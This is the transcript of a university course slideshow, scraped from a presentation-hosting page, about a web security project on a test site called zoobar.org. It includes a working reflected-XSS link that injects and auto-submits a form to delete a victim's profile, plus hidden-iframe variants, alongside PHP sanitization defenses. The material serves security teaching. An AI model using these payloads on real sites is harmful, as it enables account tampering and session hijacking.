project 2 web app security n.
Download
Skip this Video
Loading SlideShow in 5 Seconds..
Project 2: Web App Security PowerPoint Presentation
Download Presentation
Project 2: Web App Security

Loading in 2 Seconds...

play fullscreen
1 / 29

Project 2: Web App Security - PowerPoint PPT Presentation


  • 91 Views
  • Uploaded on

Spring 2006. CS 155. Project 2: Web App Security. Collin Jackson. Deadlines. Part 1. Attacks. Overview. Explore several attack types Requires both effectiveness and stealth Learn : How an attacker can evade sanitization Consequences of an exploit JavaScript Very basic CSS.

loader
I am the owner, or an agent authorized to act on behalf of the owner, of the copyrighted work described.
capcha
Download Presentation

PowerPoint Slideshow about 'Project 2: Web App Security' - kael


An Image/Link below is provided (as is) to download presentation

Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author.While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server.


- - - - - - - - - - - - - - - - - - - - - - - - - - E N D - - - - - - - - - - - - - - - - - - - - - - - - - -
Presentation Transcript
part 1

Part 1

Attacks

overview
Overview
  • Explore several

attack types

  • Requires both

effectiveness

and stealth

  • Learn:
    • How an attacker can evade sanitization
    • Consequences of an exploit
    • JavaScript
    • Very basic CSS
attacks
Attack A: Cookie Theft

Use URL encoding

Could hijack session

Attack C: Login Snooping

Evade sanitization

Handle DOM events

Attack B: Silent Transfer

Navigate browser

Use iframes, forms

Attack D: Profile Worm

Confuse site scripts

Replicate

Attacks

form

link

email

zoobar.org

zoobar.org

badguy.com

redirect

stanford.edu

form

badguy.com

email

zoobar.org

zoobar.org

javascript
JavaScript
  • Browser scripting language with C-like syntax
  • Sandboxed, garbage collected
  • Closures

var x = 3; var y = function() { alert(x); }; return y;

  • Encapsulation/objects

function X() { this.y = 3; } var z = new X(); alert(z.y);

  • Can interpret data as code (eval)
  • Browser-dependent
invoking javascript
Invoking JavaScript
  • Tags: <script>alert( ‘Hello world!’ )</script>
  • Links: javascript:alert( ‘Hello world!’ )
    • Wrap code in “void” if it has return value
  • Event handlers:

<form onsubmit=“alert( ‘Hello world!’ )”>

<iframe onload=“alert( ‘Hello world!’ )”>

  • CSS (IE only)

<style>body { background: url(javascript:alert( ‘Hello world!’ ));

}</style>

dom manipulation examples
DOM Manipulation Examples
  • document.getElementByID(id)
  • document.getElementsByTagName(tag)
  • document.write(htmltext)
  • document.createElement(tagname)
  • document.body.appendChild(node)
  • document.forms[index].fieldname.value = …
  • document.formname.fieldname.value = …
  • frame.contentDocument.getElementById(id)
arrays and loops
Arrays and Loops

Example: Change href of all links on a page

var links = document.getElementsByTagName(‘a’);

for(var i = 0; i < links.length; i++) {

var link = links[i];

link.href = “javascript:alert(‘Sorry!’);”;

}

other useful functions
Other Useful Functions
  • Navigation
    • document.location
    • document.formname.submit()
    • document.forms[0].submitfield.click()
  • Delayed Events
    • node.addEventListener(eventname, handler, useCapture)
    • node.removeEventListener(eventname, handler, useCapture)
    • window.setTimeout(handler, milliseconds)
stealthy styles
Stealthy Styles

var node = document.getElementByID(“mynodeid”);

node.style.display = ‘none’; // may not load at all

node.style.visibility = ‘hidden’; // still takes up space

node.style.position = ‘absolute’; // not included in flow

document.write( // can also write CSS rules to page

“<style>#mynodeid { visibility:hidden; }</style>”);

example profile deleter
Example: Profile Deleter

???

  • Malicious hyperlink deletes

profile of user who clicks it

  • Only works when user logged in
    • User might have multiple tabs open
    • Might have chosen/forgotten not to log out
    • Might appear in another user’s profile
  • Uses vulnerability in users.php from Attack A
  • Constructs profile deletion form and submits it
find vulnerability
Find vulnerability

Site reflects

query parameter

in input field

Link can include

anything we

want here

copy form data
Copy form data

View source

to find form

fields

Create copycat

form with our

modifications

url encode
URL encode

Close

previous

<input>,

<form>

Button

click triggers

form submit

debugging
Debugging

It didn’t work.

Open JavaScript

console

Check error

Undefined 

No properties!

Two forms

with same

name

fixed version
Fixed version

Now with

correct

form

final test
Final Test

http://zoobar.org/users.php?user=%22%3E%3C%2Fform%3E%3Cform%20method%3D%22POST%22%20name%3Dprofileform

%0D%20%20action%3D%22%2Findex%2Ephp%22%3E%0D%3Ctextarea%20name%3D%22profile%5Fupdate%22%3E%3C%

2Ftextarea%3E%3Cbr%2F%3E%0D%3Cinput%20type%3Dsubmit%20name%3D%22profile%5Fsubmit%22%20value%3D%22

Save%20Profile%22%3E%3C%2Fform%3E%0D%3Cscript%3Edocument%2Eforms%5B1%5D%2Eprofile%5Fsubmit%2Eclick%28

%29%3C%2Fscript%3E

users.php

replaced

with index.php

Profile deleted

stealthier approaches
Stealthier approaches
  • Post form into hidden iframe

<form name=F action=/index.php target=myframe>…

<iframe name=myframe style=“visibility:hidden”>…

  • Open page with form in hidden iframe

<iframe name=myframe style=“visibility:hidden”>…

<script>document.myframe.contentDocument.forms[0]

.profile_update.value =“”;</script>

part 2

Part 2

Defenses

goals
Goals
  • Learn:
    • How easy it is to make mistakes
    • That even simple code can be hard to secure
    • Techniques for appropriate input validation
    • PHP
    • Very basic SQL

Little programming knowledge can be a dangerous thing

php hypertext preprocessor
PHP: Hypertext Preprocessor
  • Server scripting language with C-like syntax
  • Can intermingle static HTML and code

<input value=<?php echo $myvalue; ?>>

  • Encapsulation/objects

class X { var $y = 3; } $z = new X(); echo $z->y;

  • Can embed variables in double-quote strings

$user = “world”; echo “Hello $user!”;

or $user = “world”; echo “Hello” . $user . “!”;

  • Form data in global arrays $_GET, $_POST, …
slide23
SQL
  • Widely used database query language
  • Fetch a set of records

SELECT * FROM Person WHERE Username=‘grader’

  • Add data to the table

INSERT INTO Person (Username, Zoobars)

VALUES (‘grader’, 10)

  • Modify data

UPDATE Person SET Zoobars=42 WHERE PersonID=5

  • Query syntax (mostly) independent of vendor
file structure
File structure
  • index.php
  • users.php
  • transfer.php
  • login.php
  • includes/
    • auth.php (cookie authentication)
    • common.php (includes everything else)
    • navigation.php (site template)
  • db/
    • zoobar/
      • Person.txt (must be writable by web server)
  • Includes /usr/class/cs155/projects/pp2/txt-db-api/…

Only edit these files

txt db api
txt-db-api
  • Third-party text file database library
  • Data can be int, string, and autoincrement
  • Need to escape strings: \’ \” \\
  • Actually magic_quotes_gpc does this for us

$recipient = $_POST[‘recipient’]; // already escaped

$sql = "SELECT PersonID FROM Person WHERE Username='$recipient'";

$rs = $db->executeQuery($sql);

if( $rs->next() )

$id = $rs->getCurrentValueByName(‘PersonID’);

defenses to part 1
Attack A: Cookie Theft

Attack C: Login Snooping

Attack B: Silent Transfer

Attack D: Profile Worm

Defenses to Part 1
sanitization techniques
Sanitization Techniques
  • addslashes(string)
    • Already done by magic_quotes_gpc
    • Inverse: stripslashes(string)
  • htmlspecialchars(string [, quote_style])
    • Converts & < > ” to HTML entities
    • Use ENT_QUOTES to change ’to &#039;
  • strip_tags(string, [, allowable_tags])
    • Max tag length 1024
    • Does not sanitize tag properties
  • preg_replace(pattern, replacement, subject)
  • More info: http://php.net
more xss hunting
More XSS hunting
  • Look for untrusted input used as output
  • Note sanitization already applied to each variable
    • Form data has magic_quotes_gpc, db data does not
  • Determine browser context for output
    • Inside a quoted string within a tag – worry about ’ ”
    • Outside a tag – worry about < >
    • Input to eval – very dangerous
  • Sanitize the output if necessary
    • No penalty for erring on the side of caution
    • But sanitizing multiple times may lead to problems
  • No credit for solving non-goals: SQL injection, etc.
good luck

Good luck!

Start early

Ask questions

Be creative